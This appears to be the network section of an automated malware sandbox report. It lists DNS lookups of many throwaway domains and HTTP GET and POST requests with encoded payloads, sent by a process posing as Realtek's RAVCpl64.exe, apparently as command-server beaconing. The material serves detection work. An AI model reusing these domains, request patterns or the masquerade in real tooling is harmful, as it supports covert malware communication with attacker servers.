                                                                          Jan 9, 2025 16:52:38.690840006 CET8049818160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:38.691433907 CET8049818160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:38.691467047 CET8049818160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:38.691490889 CET8049818160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:38.691764116 CET4981880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:38.693011999 CET4981880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:39.048602104 CET8049818160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:43.706659079 CET4981980192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:44.720742941 CET4981980192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:46.735897064 CET4981980192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:46.855151892 CET8049819104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:46.855364084 CET4981980192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:46.861552000 CET4981980192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:46.980900049 CET8049819104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:46.994981050 CET8049819104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:46.995563984 CET8049819104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:46.995877028 CET4981980192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:48.377321959 CET4981980192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:49.395411015 CET4982080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:49.514132023 CET8049820104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:49.514451981 CET4982080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:49.521169901 CET4982080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:49.640743971 CET8049820104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:49.653971910 CET8049820104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:49.654628992 CET8049820104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:49.654906988 CET4982080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:51.033008099 CET4982080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:52.049690008 CET4982180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:52.168286085 CET8049821104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:52.168437958 CET4982180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:52.172091007 CET4982180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:52.172142982 CET4982180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:52.172189951 CET4982180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:52.290592909 CET8049821104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:52.290812969 CET8049821104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:52.291083097 CET8049821104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:52.291327953 CET8049821104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:52.291336060 CET8049821104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:52.328084946 CET8049821104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:52.329107046 CET8049821104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:52.329252005 CET4982180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:53.688604116 CET4982180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:54.705465078 CET4982280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:54.824615002 CET8049822104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:54.824790955 CET4982280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:54.829241037 CET4982280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:54.948544979 CET8049822104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:54.954835892 CET8049822104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:54.954960108 CET8049822104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:52:54.955658913 CET4982280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:54.956545115 CET4982280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:52:55.075798988 CET8049822104.21.13.141192.168.11.20

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 9, 2025 16:47:27.089870930 CET5711453192.168.11.201.1.1.1
                                                                          Jan 9, 2025 16:47:27.442651033 CET53571141.1.1.1192.168.11.20
                                                                          Jan 9, 2025 16:47:42.989548922 CET6337453192.168.11.201.1.1.1
                                                                          Jan 9, 2025 16:47:43.274908066 CET53633741.1.1.1192.168.11.20
                                                                          Jan 9, 2025 16:47:57.611524105 CET5922353192.168.11.201.1.1.1
                                                                          Jan 9, 2025 16:47:57.790811062 CET53592231.1.1.1192.168.11.20
                                                                          Jan 9, 2025 16:48:11.436651945 CET6415253192.168.11.201.1.1.1
                                                                          Jan 9, 2025 16:48:11.604768991 CET53641521.1.1.1192.168.11.20
                                                                          Jan 9, 2025 16:48:25.090313911 CET5762553192.168.11.201.1.1.1
                                                                          Jan 9, 2025 16:48:26.103657007 CET5762553192.168.11.209.9.9.9
                                                                          Jan 9, 2025 16:48:26.300102949 CET53576259.9.9.9192.168.11.20
                                                                          Jan 9, 2025 16:48:34.353872061 CET5492253192.168.11.209.9.9.9
                                                                          Jan 9, 2025 16:48:34.516304970 CET53549229.9.9.9192.168.11.20
                                                                          Jan 9, 2025 16:48:49.350294113 CET5366553192.168.11.209.9.9.9
                                                                          Jan 9, 2025 16:48:49.514147997 CET53536659.9.9.9192.168.11.20
                                                                          Jan 9, 2025 16:49:02.816509008 CET6441953192.168.11.209.9.9.9
                                                                          Jan 9, 2025 16:49:03.274323940 CET53644199.9.9.9192.168.11.20
                                                                          Jan 9, 2025 16:49:19.640850067 CET5675753192.168.11.209.9.9.9
                                                                          Jan 9, 2025 16:49:19.788065910 CET53567579.9.9.9192.168.11.20
                                                                          Jan 9, 2025 16:49:33.013132095 CET5078353192.168.11.209.9.9.9
                                                                          Jan 9, 2025 16:49:33.154484034 CET53507839.9.9.9192.168.11.20
                                                                          Jan 9, 2025 16:49:41.214587927 CET5501453192.168.11.209.9.9.9
                                                                          Jan 9, 2025 16:49:42.134790897 CET53550149.9.9.9192.168.11.20
                                                                          Jan 9, 2025 16:49:55.882602930 CET6457153192.168.11.209.9.9.9
                                                                          Jan 9, 2025 16:49:56.247581005 CET53645719.9.9.9192.168.11.20
                                                                          Jan 9, 2025 16:50:10.582547903 CET5941053192.168.11.209.9.9.9
                                                                          Jan 9, 2025 16:50:10.764961004 CET53594109.9.9.9192.168.11.20
                                                                          Jan 9, 2025 16:50:25.096172094 CET6527253192.168.11.209.9.9.9
                                                                          Jan 9, 2025 16:50:25.312874079 CET53652729.9.9.9192.168.11.20
                                                                          Jan 9, 2025 16:50:38.874315977 CET5678653192.168.11.209.9.9.9
                                                                          Jan 9, 2025 16:50:39.025665998 CET53567869.9.9.9192.168.11.20
                                                                          Jan 9, 2025 16:50:52.761991978 CET5571553192.168.11.209.9.9.9
                                                                          Jan 9, 2025 16:50:52.881791115 CET53557159.9.9.9192.168.11.20
                                                                          Jan 9, 2025 16:51:49.951899052 CET5888453192.168.11.209.9.9.9
                                                                          Jan 9, 2025 16:51:50.071281910 CET53588849.9.9.9192.168.11.20

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Jan 9, 2025 16:47:27.089870930 CET192.168.11.201.1.1.10x3811Standard query (0)www.milp.storeA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:42.989548922 CET192.168.11.201.1.1.10x1de0Standard query (0)www.chiro.liveA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:57.611524105 CET192.168.11.201.1.1.10xd48bStandard query (0)www.mzkd6gp5.topA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:48:11.436651945 CET192.168.11.201.1.1.10x9a21Standard query (0)www.bokus.siteA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:48:25.090313911 CET192.168.11.201.1.1.10x37b7Standard query (0)www.elettrocoltura.infoA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:48:26.103657007 CET192.168.11.209.9.9.90x37b7Standard query (0)www.elettrocoltura.infoA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:48:34.353872061 CET192.168.11.209.9.9.90x3882Standard query (0)www.givvjn.infoA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:48:49.350294113 CET192.168.11.209.9.9.90x6e3bStandard query (0)www.bonheur.techA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:49:02.816509008 CET192.168.11.209.9.9.90xe161Standard query (0)www.rpa.asiaA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:49:19.640850067 CET192.168.11.209.9.9.90x1c56Standard query (0)www.ogbos88.cyouA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:49:33.013132095 CET192.168.11.209.9.9.90xa4feStandard query (0)www.smartbath.shopA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:49:41.214587927 CET192.168.11.209.9.9.90x2e92Standard query (0)www.100millionjobs.africaA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:49:55.882602930 CET192.168.11.209.9.9.90xc05fStandard query (0)www.mirenzhibo.netA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:10.582547903 CET192.168.11.209.9.9.90xb4e4Standard query (0)www.nextlevel.financeA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:25.096172094 CET192.168.11.209.9.9.90xd3beStandard query (0)www.furrcali.xyzA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:38.874315977 CET192.168.11.209.9.9.90x240eStandard query (0)www.buyspeechst.shopA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:52.761991978 CET192.168.11.209.9.9.90xfd33Standard query (0)www.lejgnu.infoA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:51:49.951899052 CET192.168.11.209.9.9.90x5171Standard query (0)www.elettrocoltura.infoA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Jan 9, 2025 16:47:27.442651033 CET1.1.1.1192.168.11.200x3811No error (0)www.milp.store194.9.94.85A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:27.442651033 CET1.1.1.1192.168.11.200x3811No error (0)www.milp.store194.9.94.86A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:43.274908066 CET1.1.1.1192.168.11.200x1de0No error (0)www.chiro.live198.58.118.167A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:43.274908066 CET1.1.1.1192.168.11.200x1de0No error (0)www.chiro.live45.79.19.196A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:43.274908066 CET1.1.1.1192.168.11.200x1de0No error (0)www.chiro.live45.56.79.23A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:43.274908066 CET1.1.1.1192.168.11.200x1de0No error (0)www.chiro.live45.33.20.235A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:43.274908066 CET1.1.1.1192.168.11.200x1de0No error (0)www.chiro.live173.255.194.134A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:43.274908066 CET1.1.1.1192.168.11.200x1de0No error (0)www.chiro.live72.14.185.43A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:43.274908066 CET1.1.1.1192.168.11.200x1de0No error (0)www.chiro.live45.33.2.79A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:43.274908066 CET1.1.1.1192.168.11.200x1de0No error (0)www.chiro.live72.14.178.174A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:43.274908066 CET1.1.1.1192.168.11.200x1de0No error (0)www.chiro.live45.33.18.44A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:43.274908066 CET1.1.1.1192.168.11.200x1de0No error (0)www.chiro.live45.33.30.197A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:43.274908066 CET1.1.1.1192.168.11.200x1de0No error (0)www.chiro.live96.126.123.244A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:43.274908066 CET1.1.1.1192.168.11.200x1de0No error (0)www.chiro.live45.33.23.183A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:57.790811062 CET1.1.1.1192.168.11.200xd48bNo error (0)www.mzkd6gp5.top104.21.96.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:57.790811062 CET1.1.1.1192.168.11.200xd48bNo error (0)www.mzkd6gp5.top104.21.32.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:57.790811062 CET1.1.1.1192.168.11.200xd48bNo error (0)www.mzkd6gp5.top104.21.80.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:57.790811062 CET1.1.1.1192.168.11.200xd48bNo error (0)www.mzkd6gp5.top104.21.64.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:57.790811062 CET1.1.1.1192.168.11.200xd48bNo error (0)www.mzkd6gp5.top104.21.112.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:57.790811062 CET1.1.1.1192.168.11.200xd48bNo error (0)www.mzkd6gp5.top104.21.16.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:47:57.790811062 CET1.1.1.1192.168.11.200xd48bNo error (0)www.mzkd6gp5.top104.21.48.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:48:11.604768991 CET1.1.1.1192.168.11.200x9a21No error (0)www.bokus.site199.192.21.169A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:48:26.300102949 CET9.9.9.9192.168.11.200x37b7Name error (3)www.elettrocoltura.infononenoneA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:48:34.516304970 CET9.9.9.9192.168.11.200x3882No error (0)www.givvjn.info47.83.1.90A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:48:49.514147997 CET9.9.9.9192.168.11.200x6e3bNo error (0)www.bonheur.tech76.223.54.146A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:48:49.514147997 CET9.9.9.9192.168.11.200x6e3bNo error (0)www.bonheur.tech13.248.169.48A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:49:03.274323940 CET9.9.9.9192.168.11.200xe161No error (0)www.rpa.asia160.25.166.123A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:49:19.788065910 CET9.9.9.9192.168.11.200x1c56No error (0)www.ogbos88.cyou104.21.13.141A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:49:19.788065910 CET9.9.9.9192.168.11.200x1c56No error (0)www.ogbos88.cyou172.67.132.227A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:49:33.154484034 CET9.9.9.9192.168.11.200xa4feName error (3)www.smartbath.shopnonenoneA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:49:42.134790897 CET9.9.9.9192.168.11.200x2e92No error (0)www.100millionjobs.africa100millionjobs.africaCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 9, 2025 16:49:42.134790897 CET9.9.9.9192.168.11.200x2e92No error (0)100millionjobs.africa136.243.64.147A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:49:56.247581005 CET9.9.9.9192.168.11.200xc05fNo error (0)www.mirenzhibo.net202.95.11.110A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:10.764961004 CET9.9.9.9192.168.11.200xb4e4No error (0)www.nextlevel.finance76.223.54.146A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:10.764961004 CET9.9.9.9192.168.11.200xb4e4No error (0)www.nextlevel.finance13.248.169.48A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:25.312874079 CET9.9.9.9192.168.11.200xd3beNo error (0)www.furrcali.xyz103.106.67.112A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:39.025665998 CET9.9.9.9192.168.11.200x240eNo error (0)www.buyspeechst.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:39.025665998 CET9.9.9.9192.168.11.200x240eNo error (0)www.buyspeechst.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:39.025665998 CET9.9.9.9192.168.11.200x240eNo error (0)www.buyspeechst.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:39.025665998 CET9.9.9.9192.168.11.200x240eNo error (0)www.buyspeechst.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:39.025665998 CET9.9.9.9192.168.11.200x240eNo error (0)www.buyspeechst.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:39.025665998 CET9.9.9.9192.168.11.200x240eNo error (0)www.buyspeechst.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:39.025665998 CET9.9.9.9192.168.11.200x240eNo error (0)www.buyspeechst.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:50:52.881791115 CET9.9.9.9192.168.11.200xfd33Name error (3)www.lejgnu.infononenoneA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 16:51:50.071281910 CET9.9.9.9192.168.11.200x5171Name error (3)www.elettrocoltura.infononenoneA (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • www.milp.store
                                                                          • www.chiro.live
                                                                          • www.mzkd6gp5.top
                                                                          • www.bokus.site
                                                                          • www.givvjn.info
                                                                          • www.bonheur.tech
                                                                          • www.rpa.asia
                                                                          • www.ogbos88.cyou
                                                                          • www.100millionjobs.africa
                                                                          • www.mirenzhibo.net
                                                                          • www.nextlevel.finance
                                                                          • www.furrcali.xyz
                                                                          • www.buyspeechst.shop

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.11.2049745194.9.94.85807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:47:27.697716951 CET528OUTGET /js1x/?LSbaT=zft4LoBw&lV=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec= HTTP/1.1
                                                                          Host: www.milp.store
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:47:27.946897030 CET1289INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Thu, 09 Jan 2025 15:47:27 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.1.30
                                                                          Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                          Jan 9, 2025 16:47:27.946958065 CET1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                          Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                          Jan 9, 2025 16:47:27.947000980 CET1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                          Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                          Jan 9, 2025 16:47:27.947042942 CET1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                          Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                          Jan 9, 2025 16:47:27.947077990 CET661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                          Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                          Jan 9, 2025 16:47:27.947110891 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.11.2049746198.58.118.167807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:47:43.426031113 CET789OUTPOST /jwa9/ HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.chiro.live
                                                                          Referer: http://www.chiro.live/jwa9/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 4a 51 5a 33 37 4c 6f 44 49 59 30 2f 43 6e 6b 43 57 72 52 43 67 3d 3d
                                                                          Data Ascii: lV=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoJQZ37LoDIY0/CnkCWrRCg==
                                                                          Jan 9, 2025 16:47:43.570617914 CET806INHTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:47:43 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 36 c6 76 6c d3 40 3a 09 f5 67 89 9d 38 4e 30 be 64 84 a4 58 22 42 a2 20 c0 4e a7 ff bd 18 3a 31 1d f7 50 1d 90 76 d9 7d bb ef ad 64 7e f8 b6 b0 57 de dd 50 21 32 64 57 67 e6 61 53 18 e0 5b 4b c5 5c bd 3a 53 8a 65 12 0c 50 75 2c cd 10 4b a0 40 02 e2 04 4b 4b 7d 5c 8d 1a 83 3f 91 c7 df 44 ca a8 81 7f a4 34 b3 d4 5d 23 05 0d 28 c2 08 48 ea 33 ac 2a 50 70 89 79 91 3b 1d 5a 18 6d f1 49 36 07 21 b6 d4 8c e2 3c 12 b1 ac 25 e4 14 49 62 21 9c 51 88 1b a5 f1 59 a1 9c 4a 0a 58 23 81 80 61 4b 6f b6 ea 70 92 4a 86 af 4c ad da 4b 3a 65 93 5c 24 30 a6 91 3c d2 fa 77 ef 31 7e 89 71 42 6a 2d b4 2e d3 98 59 07 7e 5f 34 2d cf f3 7e ab 09 09 8d 45 93 d1 0c 6b aa a2 1d 21 4d ed b4 8c 59 aa 57 97 e7 b4 c4 c5 ff 95 30 b5 e3 60 4c 5f a0 bd 22 38 13 00 59 2a 12 cf d5 f1 e3 a7 ba 18 15 65 45 ee a3 42 5d 89 77 52 0b 40 06 2a 6f 2d ee a0 c4 4b ca a1 a4 82 2b 35 28 e5 e7 bb 7e 87 90 c3 ca 29 47 22 6f 4a 11 35 99 80 c5 7c 05 6f 92 82 90 62 [TRUNCATED]
